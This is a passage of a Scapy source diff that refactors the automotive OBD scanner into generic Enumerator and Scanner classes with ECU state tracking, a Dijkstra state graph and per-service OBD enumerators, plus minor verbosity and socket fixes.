+- scapy/tools/automotive/isotpscanner.py | 1 + scapy/tools/automotive/obdscanner.py | 76 +++- scapy/utils.py | 65 +++- test/contrib/automotive/enumerator.uts | 153 ++++++++ test/contrib/automotive/obd/scanner.uts | 167 +++++---- test/tools/obdscanner.uts | 177 ++++++---- 11 files changed, 1145 insertions(+), 422 deletions(-) create mode 100644 scapy/contrib/automotive/enumerator.py create mode 100644 test/contrib/automotive/enumerator.uts diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index ef78c184491..649f91769dc 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -38,6 +38,7 @@ class AnsweringMachine(six.with_metaclass(ReferenceAM, object)): def __init__(self, **kargs): self.mode = 0 + self.verbose = kargs.get("verbose", conf.verb >= 0) if self.filter: kargs.setdefault("filter", self.filter) kargs.setdefault("prn", self.reply) @@ -108,7 +109,7 @@ def reply(self, pkt): return reply = self.make_reply(pkt) self.send_reply(reply) - if conf.verb >= 0: + if self.verbose: self.print_reply(pkt, reply) def run(self, *args, **kargs): diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index e40f7af5cf7..03f3ee6fba5 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -19,7 +19,50 @@ from scapy.sessions import DefaultSession from scapy.ansmachine import AnsweringMachine -__all__ = ["ECU", "ECUResponse", "ECUSession", "ECU_am"] +__all__ = ["ECU_State", "ECU", "ECUResponse", "ECUSession", "ECU_am"] + + +class ECU_State(object): + def __init__(self, session=1, tester_present=False, security_level=0, + communication_control=0, **kwargs): + self.session = session + self.security_level = security_level + self.communication_control = communication_control + self._tp = tester_present + self.misc = kwargs + + def reset(self): + self.session = 1 + self.security_level = 0 + self.communication_control = 0 + self._tp = False + self.misc = dict() + + @property + def tp(self): + return self._tp or self.session > 1 + + def __eq__(self, other): + return other.session == self.session and other.tp == self.tp and \ + other.misc == self.misc and \ + self.security_level == other.security_level + + def __ne__(self, other): + return not other == self + + def __lt__(self, other): + if self.session == other.session: + return len(self.misc) < len(other.misc) + return self.session < other.session + + def __hash__(self): + return hash(repr(self)) + + def __repr__(self): + tps = "_TP" if self.tp else "" + sl = "_SL%d" % self.security_level if self.security_level else "" + ks = "_" + "_".join(self.misc.keys()) if len(self.misc) else "" + return "%d%s%s%s" % (self.session, tps, sl, ks) class ECU(object): @@ -60,9 +103,9 @@ def __init__(self, init_session=None, init_security_level=None, :param store_supported_responses: Turn creation of supported responses on or off. Default is on. """ - self.current_session = init_session or 1 - self.current_security_level = init_security_level or 0 - self.communication_control = init_communication_control or 0 + self.state = ECU_State( + session=init_session or 1, security_level=init_security_level or 0, + communication_control=init_communication_control or 0) self.verbose = verbose self.logging = logging self.store_supported_responses = store_supported_responses @@ -70,10 +113,32 @@ def __init__(self, init_session=None, init_security_level=None, self._supported_responses = list() self._unanswered_packets = PacketList() + @property + def current_session(self): + return self.state.session + + @current_session.setter + def current_session(self, ses): + self.state.session = ses + + @property + def current_security_level(self): + return self.state.security_level + + @current_security_level.setter + def current_security_level(self, sec): + self.state.security_level = sec + + @property + def communication_control(self): + return self.state.communication_control + + @communication_control.setter + def communication_control(self, cc): + self.state.communication_control = cc + def reset(self): - self.current_session = 1 - self.current_security_level = 0 - self.communication_control = 0 + self.state.reset() def update(self, p): if isinstance(p, PacketList): diff --git a/scapy/contrib/automotive/enumerator.py b/scapy/contrib/automotive/enumerator.py new file mode 100644 index 00000000000..5ae510193d6 --- /dev/null +++ b/scapy/contrib/automotive/enumerator.py @@ -0,0 +1,392 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = Enumerator and Automotive Scanner Baseclasses +# scapy.contrib.status = loads + +from collections import defaultdict, namedtuple + +from scapy.error import Scapy_Exception, log_interactive, warning +from scapy.utils import make_lined_table, SingleConversationSocket +from scapy.modules import six +from scapy.contrib.automotive.ecu import ECU_State + + +class Graph: + def __init__(self): + """ + self.edges is a dict of all possible next nodes + e.g. {'X': ['A', 'B', 'C', 'E'], ...} + self.weights has all the weights between two nodes, + with the two nodes as a tuple as the key + e.g. {('X', 'A'): 7, ('X', 'B'): 2, ...} + """ + self.edges = defaultdict(list) + self.weights = {} + + def add_edge(self, from_node, to_node, weight=1): + # Note: assumes edges are bi-directional + self.edges[from_node].append(to_node) + self.edges[to_node].append(from_node) + self.weights[(from_node, to_node)] = weight + self.weights[(to_node, from_node)] = weight + + @property + def nodes(self): + return self.edges.keys() + + @staticmethod + def dijsktra(graph, initial, end): + # shortest paths is a dict of nodes + # whose value is a tuple of (previous node, weight) + shortest_paths = {initial: (None, 0)} + current_node = initial + visited = set() + + while current_node != end: + visited.add(current_node) + destinations = graph.edges[current_node] + weight_to_current_node = shortest_paths[current_node][1] + + for next_node in destinations: + weight = \ + graph.weights[(current_node, next_node)] + \ + weight_to_current_node + if next_node not in shortest_paths: + shortest_paths[next_node] = (current_node, weight) + else: + current_shortest_weight = shortest_paths[next_node][1] + if current_shortest_weight > weight: + shortest_paths[next_node] = (current_node, weight) + + next_destinations = {node: shortest_paths[node] for node in + shortest_paths if node not in visited} + if not next_destinations: + return None + # next node is the destination with the lowest weight + current_node = min(next_destinations, + key=lambda k: next_destinations[k][1]) + + # Work back through destinations in shortest path + path = [] + while current_node is not None: + path.append(current_node) + next_node = shortest_paths[current_node][0] + current_node = next_node + # Reverse path + path.reverse() + return path + + +class Enumerator(object): + """ Base class for Enumerators + + Args: + sock: socket where enumeration takes place + """ + description = "About my results" + negative_response_blacklist = [] + ScanResult = namedtuple("ScanResult", "state req resp") + + def __init__(self, sock): + self.sock = sock + self.results = list() + self.stats = {"answered": 0, "unanswered": 0, "answertime_max": 0, + "answertime_min": 0, "answertime_avg": 0, + "negative_resps": 0} + self.state_completed = defaultdict(bool) + self.retry_pkt = None + self.request_iterators = dict() + + @property + def completed(self): + return all([self.state_completed[s] for s in self.scanned_states]) + + def pre_scan(self, global_configuration): + pass + + def scan(self, state, requests, timeout=1, **kwargs): + + if state not in self.request_iterators: + self.request_iterators[state] = iter(requests) + + if self.retry_pkt: + it = [self.retry_pkt] + else: + it = self.request_iterators[state] + + log_interactive.debug("Using iterator %s in state %s" % (it, state)) + + for req in it: + try: + res = self.sock.sr1(req, timeout=timeout, verbose=False) + except ValueError as e: + warning("Exception in scan %s" % e) + break + + self.results.append(Enumerator.ScanResult(state, req, res)) + if self.evaluate_response(res, **kwargs): + return + + self.update_stats() + self.state_completed[state] = True + + def post_scan(self, global_configuration): + pass + + def evaluate_response(self, response, **kwargs): + return self is None # always return False by default + + def dump(self, completed_only=True): + if completed_only: + selected_states = [k for k, v in self.state_completed.items() if v] + else: + selected_states = self.state_completed.keys() + + data = [{"state": str(s), + "protocol": str(req.__class__.__name__), + "req_time": req.sent_time, + "req_data": str(req), + "resp_time": resp.time if resp is not None else None, + "resp_data": str(resp) if resp is not None else None, + "isotp_params": { + "resp_src": resp.src, "resp_dst": resp.dst, + "resp_exsrc": resp.exsrc, "resp_exdst": resp.exdst} + if resp is not None else None} + for s, req, resp in self.results if s in selected_states] + + return {"format_version": 0.1, + "name": str(self.__class__.__name__), + "states_completed": [(str(k), v) for k, v in + self.state_completed.items()], + "data": data} + + def remove_completed_states(self): + selected_states = [k for k, v in self.state_completed.items() if not v] + uncompleted_results = [r for r in self.results if + r.state in selected_states] + self.results = uncompleted_results + + def update_stats(self): + answered = self.filtered_results + unanswered = [r for r in self.results if r.resp is None] + answertimes = [x.resp.time - x.req.sent_time for x in answered if + x.resp.time is not None and x.req.sent_time is not None] + nrs = [r.resp for r in self.filtered_results if r.resp.service == 0x7f] + try: + self.stats["answered"] = len(answered) + self.stats["unanswered"] = len(unanswered) + self.stats["negative_resps"] = len(nrs) + self.stats["answertime_max"] = max(answertimes) + self.stats["answertime_min"] = min(answertimes) + self.stats["answertime_avg"] = sum(answertimes) / len(answertimes) + except (ValueError, ZeroDivisionError): + for k, v in self.stats.items(): + if v is None: + self.stats[k] = 0 + + @property + def filtered_results(self): + return [r for r in self.results if r.resp is not None] + + @property + def scanned_states(self): + return set([s for s, _, _, in self.results]) + + def show_negative_response_details(self, dump=False): + raise NotImplementedError("This needs a protocol specific " + "implementation") + + def show(self, dump=False, filtered=True, verbose=False): + s = "\n\n" + "=" * (len(self.description) + 10) + "\n" + s += " " * 5 + self.description + "\n" + s += "-" * (len(self.description) + 10) + "\n" + + s += "%d requests were sent, %d answered, %d unanswered" % \ + (len(self.results), self.stats["answered"], + self.stats["unanswered"]) + "\n" + + s += "Times between request and response:\tMIN: %f\tMAX: %f\tAVG: %f" \ + % (self.stats["answertime_min"], self.stats["answertime_max"], + self.stats["answertime_avg"]) + "\n" + + s += "%d negative responses were received" % \ + self.stats["negative_resps"] + "\n" + + if not dump: + print(s) + s = "" + else: + s += "\n" + + s += self.show_negative_response_details(dump) or "" + "\n" + + if len(self.negative_response_blacklist): + s += "The following negative response codes are blacklisted: " + s += "%s" % self.negative_response_blacklist + "\n" + + if not dump: + print(s) + else: + s += "\n" + + data = self.results if not filtered else self.filtered_results + if len(data): + s += make_lined_table(data, self.get_table_entry, dump=dump) or "" + else: + s += "=== No data to display ===\n" + if verbose: + completed = [(x, self.state_completed[x]) + for x in self.scanned_states] + s += make_lined_table(completed, + lambda tup: ("Scan state completed", tup[0], + tup[1]), + dump=dump) or "" + + return s if dump else None + + @staticmethod + def get_table_entry(tup): + raise NotImplementedError() + + @staticmethod + def get_label(response, + positive_case="PR: PositiveResponse", + negative_case="NR: NegativeResponse"): + if response is None: + label = "Timeout" + elif response.service == 0x7f: + # FIXME: service is a protocol specific field + label = negative_case + else: + if isinstance(positive_case, six.string_types): + label = positive_case + elif callable(positive_case): + label = positive_case() + else: + raise Scapy_Exception("Unsupported Type for positive_case. " + "Provide a string or a function.") + return label + + +class Scanner(object): + default_enumerator_clss = [] + + def __init__(self, socket, reset_handler=None, enumerators=None, **kwargs): + # The TesterPresentSender can interfere with a enumerator, since a + # target may only allow one request at a time. + # The SingleConversationSocket prevents interleaving requests. + if not isinstance(socket, SingleConversationSocket): + self.socket = SingleConversationSocket(socket) + else: + self.socket = socket + self.tps = None # TesterPresentSender + self.target_state = ECU_State() + self.reset_handler = reset_handler + self.verbose = kwargs.get("verbose", False) + if enumerators: + # enumerators can be a mix of classes or instances + self.enumerators = [e(self.socket) for e in enumerators if not isinstance(e, Enumerator)] + [e for e in enumerators if isinstance(e, Enumerator)] # noqa: E501 + else: + self.enumerators = [e(self.socket) for e in self.default_enumerator_clss] # noqa: E501 + self.enumerator_classes = [e.__class__ for e in self.enumerators] + self.state_graph = Graph() + self.state_graph.add_edge(ECU_State(), ECU_State()) + self.configuration = \ + {"dynamic_timeout": kwargs.pop("dynamic_timeout", False), + "enumerator_classes": self.enumerator_classes, + "verbose": self.verbose, + "state_graph": self.state_graph, + "delay_state_change": kwargs.pop("delay_state_change", 0.5)} + + for e in self.enumerators: + self.configuration[e.__class__] = kwargs.pop( + e.__class__.__name__ + "_kwargs", dict()) + + for conf_key in self.enumerators: + conf_val = self.configuration[conf_key.__class__] + for kwargs_key, kwargs_val in kwargs.items(): + if kwargs_key not in conf_val.keys(): + conf_val[kwargs_key] = kwargs_val + self.configuration[conf_key.__class__] = conf_val + + log_interactive.debug("The following configuration was created") + log_interactive.debug(self.configuration) + + def dump(self, completed_only=True): + return {"format_version": 0.1, + "enumerators": [e.dump(completed_only) + for e in self.enumerators], + "state_graph": [str(p) for p in self.get_state_paths()], + "dynamic_timeout": self.configuration["dynamic_timeout"], + "verbose": self.configuration["verbose"], + "delay_state_change": self.configuration["delay_state_change"]} + + def get_state_paths(self): + paths = [Graph.dijsktra(self.state_graph, ECU_State(), s) + for s in self.state_graph.nodes if s != ECU_State()] + return sorted([p for p in paths if p is not None] + [[ECU_State()]], + key=lambda x: x[-1]) + + def reset_target(self): + log_interactive.info("[i] Target reset") + self.reset_tps() + if self.reset_handler: + try: + self.reset_handler(self) + except TypeError: + self.reset_handler() + + self.target_state = ECU_State() + + def execute_enumerator(self, enumerator): + enumerator_kwargs = self.configuration[enumerator.__class__] + enumerator.pre_scan(self.configuration) + enumerator.scan(state=self.target_state, **enumerator_kwargs) + enumerator.post_scan(self.configuration) + + def reset_tps(self): + if self.tps: + self.tps.stop() + self.tps = None + + def scan(self): + scan_complete = False + while not scan_complete: + scan_complete = True + log_interactive.info("[i] Scan paths %s" % self.get_state_paths()) + for p in self.get_state_paths(): + log_interactive.info("[i] Scan path %s" % p) + final_state = p[-1] + for e in self.enumerators: + if e.state_completed[final_state]: + log_interactive.debug("[+] State %s for %s completed" % + (repr(final_state), e)) + continue + if not self.enter_state_path(p): + log_interactive.error("[-] Error entering path %s" % p) + continue + log_interactive.info("[i] EXECUTE SCAN %s for path %s" % + (e.__class__.__name__, p)) + self.execute_enumerator(e) + scan_complete = False + self.reset_target() + + def enter_state_path(self, path): + if path[0] != ECU_State(): + raise Scapy_Exception( + "Initial state of path not equal reset state of the target") + + self.reset_target() + if len(path) == 1: + return True + + for s in path[1:]: + if not self.enter_state(s): + return False + return True + + def enter_state(self, state): + raise NotImplementedError diff --git a/scapy/contrib/automotive/obd/scanner.py b/scapy/contrib/automotive/obd/scanner.py index 1f01a9a7737..3a01165b588 100644 --- a/scapy/contrib/automotive/obd/scanner.py +++ b/scapy/contrib/automotive/obd/scanner.py @@ -2,230 +2,245 @@ # See http://www.secdev.org/projects/scapy for more information # Copyright (C) Andreas Korb # Copyright (C) Friedrich Feigel +# Copyright (C) Nils Weiss # This program is published under a GPLv2 license # scapy.contrib.description = OnBoardDiagnosticScanner # scapy.contrib.status = loads -# XXX TODO This file contains illegal E501 issues D: -from scapy.compat import chb from scapy.contrib.automotive.obd.obd import OBD, OBD_S03, OBD_S07, OBD_S0A, \ - OBD_S01, OBD_S06, OBD_S08, OBD_S09 + OBD_S01, OBD_S06, OBD_S08, OBD_S09, OBD_NR, OBD_S02, OBD_S02_Record +from scapy.contrib.automotive.enumerator import Scanner, Enumerator +from scapy.config import conf +from scapy.themes import BlackAndWhite + + +class OBD_Enumerator(Enumerator): + def scan(self, state, requests, exit_scan_on_first_negative_response=False, + retry_if_busy_returncode=True, retries=3, timeout=1, **kwargs): + # remove verbose from kwargs to not spam the output + kwargs.pop("verbose", None) + for req in requests: + res = None + for _ in range(retries): + res = self.sock.sr1(req, timeout=timeout, verbose=False, + **kwargs) + if not retry_if_busy_returncode: + break + elif res and res.service == 0x7f and \ + res.response_code == 0x21: + continue + + self.results.append(Enumerator.ScanResult(state, req, res)) + if res and res.service == 0x7f and \ + exit_scan_on_first_negative_response: + break + self.update_stats() + self.state_completed[state] = True + + @property + def filtered_results(self): + return [r for r in super(OBD_Enumerator, self).filtered_results + if r.resp.service != 0x7f] + + def show_negative_response_details(self, dump=False): + nrs = [r.resp for r in self.results if r.resp is not None and + r.resp.service == 0x7f] + s = "" + if len(nrs): + nrcs = set([nr.response_code for nr in nrs]) + s += "These negative response codes were received " + \ + " ".join([hex(c) for c in nrcs]) + "\n" + for nrc in nrcs: + s += "\tNRC 0x%02x: %s received %d times" % ( + nrc, OBD_NR(response_code=nrc).sprintf( + "%OBD_NR.response_code%"), + len([nr for nr in nrs if nr.response_code == nrc])) + s += "\n" + if dump: + return s + "\n" + else: + print(s) + + @staticmethod + def get_label(response, + positive_case="PR: PositiveResponse", + negative_case="NR: NegativeResponse"): + return Enumerator.get_label( + response, positive_case, + response.sprintf("NR: %OBD_NR.response_code%")) + + +class OBD_Service_Enumerator(OBD_Enumerator): + def get_pkts(self, p_range): + raise NotImplementedError + + def get_supported(self, state, **kwargs): + pkts = self.get_pkts(range(0, 0xff, 0x20)) + super(OBD_Service_Enumerator, self).scan( + state, pkts, exit_scan_on_first_negative_response=True, **kwargs) + supported = list() + for _, _, r in self.filtered_results: + dr = r.data_records[0] + key = next(iter((dr.lastlayer().fields.keys()))) + supported += [int(i[-2:], 16) for i in + getattr(dr, key, ["xxx00"])] + return [i for i in supported if i % 0x20] + + def scan(self, state, full_scan=False, **kwargs): + if full_scan: + supported_pids = range(0x100) + else: + supported_pids = self.get_supported(state, **kwargs) + pkts = self.get_pkts(supported_pids) + super(OBD_Service_Enumerator, self).scan(state, pkts, **kwargs) + + @staticmethod + def print_payload(resp): + backup_ct = conf.color_theme + conf.color_theme = BlackAndWhite() + load = repr(resp.data_records[0].lastlayer()) + conf.color_theme = backup_ct + return load + + +class OBD_DTC_Enumerator(OBD_Enumerator): + request = None + + def scan(self, state, full_scan=False, **kwargs): + pkts = [self.request] + super(OBD_DTC_Enumerator, self).scan(state, pkts, **kwargs) + + @staticmethod + def print_payload(resp): + backup_ct = conf.color_theme + conf.color_theme = BlackAndWhite() + load = repr(resp.dtcs) + conf.color_theme = backup_ct + return load + + +class OBD_S03_Enumerator(OBD_DTC_Enumerator): + description = "Available DTCs in OBD service 03" + request = OBD() / OBD_S03() + + @staticmethod + def get_table_entry(tup): + _, _, res = tup + label = OBD_Enumerator.get_label( + res, + positive_case=lambda: OBD_DTC_Enumerator.print_payload(res)) + return "Service 03", "%d DTCs" % res.count, label + + +class OBD_S07_Enumerator(OBD_DTC_Enumerator): + description = "Available DTCs in OBD service 07" + request = OBD() / OBD_S07() + + @staticmethod + def get_table_entry(tup): + _, _, res = tup + label = OBD_Enumerator.get_label( + res, + positive_case=lambda: OBD_DTC_Enumerator.print_payload(res)) + return "Service 07", "%d DTCs" % res.count, label + + +class OBD_S0A_Enumerator(OBD_DTC_Enumerator): + description = "Available DTCs in OBD service 10" + request = OBD() / OBD_S0A() + + @staticmethod + def get_table_entry(tup): + _, _, res = tup + label = OBD_Enumerator.get_label( + res, + positive_case=lambda: OBD_DTC_Enumerator.print_payload(res)) + return "Service 0A", "%d DTCs" % res.count, label + + +class OBD_S01_Enumerator(OBD_Service_Enumerator): + description = "Available data in OBD service 01" + + def get_pkts(self, p_range): + return (OBD() / OBD_S01(pid=[x]) for x in p_range) + + @staticmethod + def get_table_entry(tup): + _, req, res = tup + label = OBD_Enumerator.get_label( + res, + positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) + return "Service 01", "0x%02x" % req.pid[0], label + + +class OBD_S02_Enumerator(OBD_Service_Enumerator): + description = "Available data in OBD service 02" + + def get_pkts(self, p_range): + return (OBD() / OBD_S02(requests=[OBD_S02_Record(pid=[x])]) + for x in p_range) + + @staticmethod + def get_table_entry(tup): + _, req, res = tup + label = OBD_Enumerator.get_label( + res, + positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) + return "Service 02", "0x%02x" % req.pid[0], label + + +class OBD_S06_Enumerator(OBD_Service_Enumerator): + description = "Available data in OBD service 06" + def get_pkts(self, p_range): + return (OBD() / OBD_S06(mid=[x]) for x in p_range) + + @staticmethod + def get_table_entry(tup): + _, req, res = tup + label = OBD_Enumerator.get_label( + res, + positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) + return "Service 06", "0x%02x" % req.mid[0], label -def _supported_id_numbers(socket, timeout, service_class, id_name, verbose): - """ Check which Parameter IDs are supported by the vehicle - Args: - socket: is the ISOTPSocket, over which the OBD-Services communicate. - the id 0x7df acts as a broadcast address for all obd-supporting ECUs. - timeout: only required for the OBD Simulator, since it might tell it - supports a PID, while it actually doesn't and won't respond to this PID. - If this happens with a real ECU, it is an implementation error. - service_class: specifies, which OBD-Service should be queried. - id_name: describes the car domain (e.g.: mid = IDs in Motor Domain). - verbose: specifies, whether the sr1()-method gives feedback or not. - - This method sends a query message via a ISOTPSocket, which will be responded by the ECUs with - a message containing Bits, representing whether a PID is supported by the vehicle's protocol implementation or not. - The first Message has the PID 0x00 and contains 32 Bits, which indicate by their index and value, which PIDs are - supported. - If the PID 0x20 is supported, that means, there are more supported PIDs within the next 32 PIDs, which will result - in a new query message being sent, that contains the next 32 Bits. - There is a maximum of 256 possible PIDs. - The supported PIDs will be returned as set. - """ - - supported_id_numbers = set() - supported_prop = 'supported_' + id_name + 's' - - # ID 0x00 requests the first range of supported IDs in OBD - supported_ids_req = OBD() / service_class(b'\x00') - - while supported_ids_req is not None: - resp = socket.sr1(supported_ids_req, timeout=timeout, verbose=verbose) - - # If None, the device did not respond. - # Usually only occurs, if device is off. - if resp is None or resp.service == 0x7f: - break - - supported_ids_req = None - - all_supported_in_range = getattr(resp.data_records[0], supported_prop) - - for supported in all_supported_in_range: - id_number = int(supported[-2:], 16) - supported_id_numbers.add(id_number) - - # send a new query if the next PID range is supported - if id_number % 0x20 == 0: - supported_ids_req = OBD() / service_class(chb(id_number)) - - return supported_id_numbers - - -def _scan_id_service(socket, timeout, service_class, id_numbers, verbose): - """ Queries certain PIDs and stores their return value - - Args: - socket: is the ISOTPSocket, over which the OBD-Services communicate. - the id 0x7df acts as a broadcast address for all obd-supporting ECUs. - timeout: only required for the OBD Simulator, since it might tell it - supports a PID, while it actually doesn't and won't respond to this PID. - If this happens with a real ECU, it is an implementation error. - service_class: specifies, which OBD-Service should be queried. - id_numbers: a set of PIDs, which should be queried by the method. - verbose: specifies, whether the sr1()-method gives feedback or not. - - This method queries the specified id_numbers and stores their responses in a dictionary, which is then returned. - """ - - data = dict() - - for id_number in id_numbers: - id_byte = chb(id_number) - # assemble request packet - pkt = OBD() / service_class(id_byte) - resp = socket.sr1(pkt, timeout=timeout, verbose=verbose) - - if resp is not None: - data[id_number] = bytes(resp) - return data - - -def _scan_dtc_service(socket, timeout, service_class, verbose): - """ Queries Diagnostic Trouble Code Parameters and stores their return value - - Args: - socket: is the ISOTPSocket, over which the OBD-Services communicate. - the id 0x7df acts as a broadcast address for all obd-supporting ECUs. - timeout: only required for the OBD Simulator, since it might tell it - supports a PID, while it actually doesn't and won't respond to this PID. - If this happens with a real ECU, it is an implementation error. - service_class: specifies, which OBD-Service should be queried. - verbose: specifies, whether the sr1()-method gives feedback or not. - - This method queries the specified Diagnostic Trouble Code Parameters and stores their responses in a dictionary, - which is then returned. - """ - - req = OBD() / service_class() - resp = socket.sr1(req, timeout=timeout, verbose=verbose) - if resp is not None: - return bytes(resp) - - -def obd_scan(socket, timeout=0.1, supported_ids=False, - unsupported_ids=False, verbose=False): - """ Scans for all accessible information of each commonly used OBD service classes and prints the results - - Args: - socket: is the ISOTPSocket, over which the OBD-Services communicate. - the id 0x7df acts as a broadcast address for all obd-supporting ECUs. - timeout: only required for the OBD Simulator, since it might tell it - supports a PID, while it actually doesn't and won't respond to this PID. - If this happens with a real ECU, it is an implementation error. - supported_ids: specifies, whether to check for supported Parameter IDs. - The OBD-Protocol offers querying, which PIDs the implemented ECUs support. - unsupported_ids: specifies, whether to check for unsupported or hidden Parameter IDs. - There is a possibility of PIDs answering, which are addressed directly, but which are - not listed in the supported query response. We call these PIDs unsupported PIDs, because - they are seemingly unsupported. - verbose: specifies, whether the sr1()-method gives feedback or not and turns. - - This method queries the Diagnostic Trouble Code Parameters and if selected, supported and/or unsupported PIDS and - prints the results. - """ - - dtc = dict() - supported = dict() - unsupported = dict() - - if verbose: - print("\nStarting OBD-Scan...") - - print("\nScanning Diagnostic Trouble Codes:") - # Emission-related DTCs - dtc[3] = _scan_dtc_service(socket, timeout, OBD_S03, verbose) - # Emission-related DTCs detected during current or last completed driving - # cycle - dtc[7] = _scan_dtc_service(socket, timeout, OBD_S07, verbose) - # Permanent DTCs - dtc[10] = _scan_dtc_service(socket, timeout, OBD_S0A, verbose) - print("Service 3:") - print(dtc[3]) - print("Service 7:") - print(dtc[7]) - print("Service 10:") - print(dtc[10]) - - if not supported_ids and not unsupported_ids: - return dtc - - # Powertrain - supported_ids_s01 = _supported_id_numbers( - socket, timeout, OBD_S01, 'pid', verbose) - # On-board monitoring test results for non-continuously monitored systems - supported_ids_s06 = _supported_id_numbers( - socket, timeout, OBD_S06, 'mid', verbose) - # Control of on-board system, test or component - supported_ids_s08 = _supported_id_numbers( - socket, timeout, OBD_S08, 'tid', verbose) - # On-board monitoring test results for non-continuously monitored systems - supported_ids_s09 = _supported_id_numbers( - socket, timeout, OBD_S09, 'iid', verbose) - - if supported_ids: - print("\nScanning supported Parameter IDs") - supported[1] = _scan_id_service( - socket, timeout, OBD_S01, supported_ids_s01, verbose) - supported[6] = _scan_id_service( - socket, timeout, OBD_S06, supported_ids_s06, verbose) - supported[8] = _scan_id_service( - socket, timeout, OBD_S08, supported_ids_s08, verbose) - supported[9] = _scan_id_service( - socket, timeout, OBD_S09, supported_ids_s09, verbose) - print("\nSupported PIDs of Service 1:") - print(supported[1]) - print("Supported PIDs of Service 6:") - print(supported[6]) - print("Supported PIDs of Service 8:") - print(supported[8]) - print("Supported PIDs of Service 9:") - - # this option will slow down the test a lot, since it tests for seemingly unsupported ids - # the chances of those actually responding will be small, so a lot of - # timeouts can be expected - if unsupported_ids: - # the complete id range is from 1 to 255 - all_ids_set = set(range(1, 256)) - # the unsupported id ranges are obtained by creating the compliment set - # excluding 0 - unsupported_ids_s01 = all_ids_set - supported_ids_s01 - unsupported_ids_s06 = all_ids_set - supported_ids_s06 - unsupported_ids_s08 = all_ids_set - supported_ids_s08 - unsupported_ids_s09 = all_ids_set - supported_ids_s09 - - print("\nScanning unsupported Parameter IDs") - if verbose: - print("This may take a while...") - unsupported[1] = _scan_id_service( - socket, timeout, OBD_S01, unsupported_ids_s01, verbose) - unsupported[6] = _scan_id_service( - socket, timeout, OBD_S06, unsupported_ids_s06, verbose) - unsupported[8] = _scan_id_service( - socket, timeout, OBD_S08, unsupported_ids_s08, verbose) - unsupported[9] = _scan_id_service( - socket, timeout, OBD_S09, unsupported_ids_s09, verbose) - print("\nUnsupported PIDs of Service 1:") - print(unsupported[1]) - print("Unsupported PIDs of Service 6:") - print(unsupported[6]) - print("unsupported PIDs of Service 8:") - print(unsupported[8]) - print("Unsupported PIDs of Service 9:") - print(unsupported[9]) - - return dtc, supported, unsupported +class OBD_S08_Enumerator(OBD_Service_Enumerator): + description = "Available data in OBD service 08" + + def get_pkts(self, p_range): + return (OBD() / OBD_S08(tid=[x]) for x in p_range) + + @staticmethod + def get_table_entry(tup): + _, req, res = tup + label = OBD_Enumerator.get_label( + res, + positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) + return "Service 08", "0x%02x" % req.tid[0], label + + +class OBD_S09_Enumerator(OBD_Service_Enumerator): + description = "Available data in OBD service 09" + + def get_pkts(self, p_range): + return (OBD() / OBD_S09(iid=[x]) for x in p_range) + + @staticmethod + def get_table_entry(tup): + _, req, res = tup + label = OBD_Enumerator.get_label( + res, + positive_case=lambda: OBD_Service_Enumerator.print_payload(res)) + return "Service 09", "0x%02x" % req.iid[0], label + + +class OBD_Scanner(Scanner): + default_enumerator_clss = [ + OBD_S01_Enumerator, OBD_S02_Enumerator, OBD_S06_Enumerator, + OBD_S08_Enumerator, OBD_S09_Enumerator, OBD_S03_Enumerator, + OBD_S07_Enumerator, OBD_S0A_Enumerator] + + def enter_state(self, state): + return True diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 6184a6b1bd5..2d9bf7cad09 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -723,7 +723,10 @@ def select(sockets, remain=None): blocking = remain is None or remain > 0 def find_ready_sockets(): - return list(filter(lambda x: not x.ins.rx_queue.empty(), sockets)) + return list(filter(lambda x: (x.ins is not None) and + (x.ins.rx_queue is not None) and + (not x.ins.rx_queue.empty()), + sockets)) ready_sockets = find_ready_sockets() if len(ready_sockets) > 0 or not blocking: diff --git a/scapy/tools/automotive/isotpscanner.py b/scapy/tools/automotive/isotpscanner.py index 4d9ff463476..7160e05bdfb 100755 --- a/scapy/tools/automotive/isotpscanner.py +++ b/scapy/tools/automotive/isotpscanner.py @@ -83,6 +83,7 @@ def main(): channel = None interface = None python_can_args = None + conf.verb = -1 options = getopt.getopt( sys.argv[1:], diff --git a/scapy/tools/automotive/obdscanner.py b/scapy/tools/automotive/obdscanner.py index 3ba633d886a..7f04a3fdfdf 100755 --- a/scapy/tools/automotive/obdscanner.py +++ b/scapy/tools/automotive/obdscanner.py @@ -23,10 +23,10 @@ if six.PY2 or not LINUX or conf.use_pypy: conf.contribs['CANSocket'] = {'use-python-can': True} -from scapy.contrib.isotp import ISOTPSocket # noqa: E402 -from scapy.contrib.cansocket import CANSocket, PYTHON_CAN # noqa: E402 -from scapy.contrib.automotive.obd.obd import OBD # noqa: E402 -from scapy.contrib.automotive.obd.scanner import obd_scan # noqa: E402 +from scapy.contrib.isotp import ISOTPSocket # noqa: E402 +from scapy.contrib.cansocket import CANSocket, PYTHON_CAN # noqa: E402 +from scapy.contrib.automotive.obd.obd import OBD # noqa: E402 +from scapy.contrib.automotive.obd.scanner import OBD_Scanner, OBD_S01_Enumerator, OBD_S02_Enumerator, OBD_S03_Enumerator, OBD_S06_Enumerator, OBD_S07_Enumerator, OBD_S08_Enumerator, OBD_S09_Enumerator, OBD_S0A_Enumerator # noqa: E402 E501 def signal_handler(sig, frame): @@ -38,8 +38,8 @@ def usage(is_error): print('''usage:\tobdscanner [-i|--interface] [-c|--channel] [-b|--bitrate] [-a|--python-can_args] [-h|--help] [-s|--source] [-d|--destination] - [-t|--timeout] [-r|--supported] - [-u|--unsupported] [-v|--verbose]\n + [-t|--timeout] [-f|--full] + [-v|--verbose]\n Scan for all possible obd service classes and their subfunctions.\n optional arguments: -c, --channel python-can channel or Linux SocketCAN interface name\n @@ -56,9 +56,16 @@ def usage(is_error): -s, --source ISOTP-socket source id (hex) -d, --destination ISOTP-socket destination id (hex) -t, --timeout Timeout after which the scanner proceeds to next service [seconds] - -r, --supported Check for supported id services - -u, --unsupported Check for unsupported id services - -v, --verbose Display information during scan\n + 